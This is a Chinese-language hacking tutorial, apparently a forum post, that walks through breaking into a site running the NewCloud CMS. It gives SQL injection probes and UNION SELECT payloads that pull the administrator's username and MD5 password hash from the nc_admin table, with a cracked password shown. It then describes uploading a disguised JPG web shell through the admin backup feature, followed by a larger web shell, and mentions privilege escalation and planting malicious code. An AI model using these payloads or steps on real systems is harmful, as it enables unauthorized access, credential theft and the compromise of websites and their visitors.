利用新云的注入漏洞直接拿到管理员密码

他这有管理员登陆入口.我们先申请一个号.

注册成功了
然后在发布文章那发布一篇文章.无语中.
and 1=1 1=2这个大家都知道的
看.存在漏洞吧
然后输入下边的SQL语句

(1):union select 1,2,3,4,5,6,7,8,9 from nc_admin where id=1
2
作者：6 　来源于：7 　发布时间：8 　发布人：9
减小字体 增大字体

3 出现了这个就证明可以爆出管理员密码
等等给消失开开FTP
再输入下面的SQL语句就能猜解出管理员密码.

(2):union select 1,2,password,4,5,username,7,8,9 from nc_admin where id=1

作者：admin 　来源于：7 　发布时间：8 　发布人：9
减小字体 增大字体
56c1a49c79a7c4ef
帐号:admin
密码:56c1a49c79a7c4ef(MD5) xjpcxy
把这个密码解密就可以进入后台了.
我们进去试试.
OK我们已经成功进入后台接下来该怎么样???你想怎么样???
当然先看看能不能备份咯.可以备份.
传个JPG格式的小马.
备份成功了.现在我们进去试试.等.点支烟
可以用.然后上传一个大马.
已经进来了.接下来就是提权或者是挂马什么的.随你们了.!
不过破坏不要搞的太多了.有报应.
我就不挂马了.挂那么多肉鸡对我来说也没什么用
算了.不搞了教程就到这吧.